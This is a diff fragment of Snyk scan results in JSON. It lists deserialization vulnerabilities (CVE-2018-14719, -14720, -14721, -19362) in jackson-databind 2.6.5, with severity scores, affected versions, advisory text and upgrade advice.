"GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 